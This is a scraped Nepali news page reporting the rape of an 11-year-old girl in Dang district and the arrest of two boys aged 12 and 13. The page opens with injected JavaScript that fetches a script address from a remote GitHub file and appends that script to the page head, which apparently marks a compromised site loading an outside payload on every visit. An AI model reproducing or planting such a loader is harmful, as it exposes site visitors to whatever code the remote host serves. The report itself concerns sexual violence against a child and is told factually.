;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); दाङमा १२ र १३ वर्षीय बालकद्वारा ११ वर्षीया बालिका बलात्कृत – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • दाङमा १२ र १३ वर्षीय बालकद्वारा ११ वर्षीया बालिका बलात्कृत
दुर्घटना/अपराध

दाङमा १२ र १३ वर्षीय बालकद्वारा ११ वर्षीया बालिका बलात्कृत

फागुन १९,हेमराज शर्मा

दाङ – दाङमा ११ वर्षकी बालिका बलात्कृत भएकी छन् । बबई गाउँपालिकामा पर्ने ट्वाङखोलाको जङ्गल हुँदै नजिकैको गाउँमा जाँदै गर्दा बेलुकी ६ बजेतिर बालिका बलात्कृत भएकी प्रहरीले जनाएको छ ।

प्रहरीले बलात्कारको आरोपमा १२ र १३ वर्षका किशोरलाई पक्राउ गरेको छ । माछा मारेर फर्कदै गरेका किशोरहरुले बालिकालाई जङ्गलको बाटोमा एक्लै भेटेपछि १३ वर्षको किशोरले बलात्कार गरेको र १२ वर्षको किशोरले बालिकालाई समातेको प्रहरीको भनाइ छ ।

बालिकाको राप्ती प्रादेशिक अस्पताल तुलसीपुरमा उपचार भइरहेको छ । प्रतिकात्मक तस्बिर

 

फेसबुक प्रतिक्रियाहरु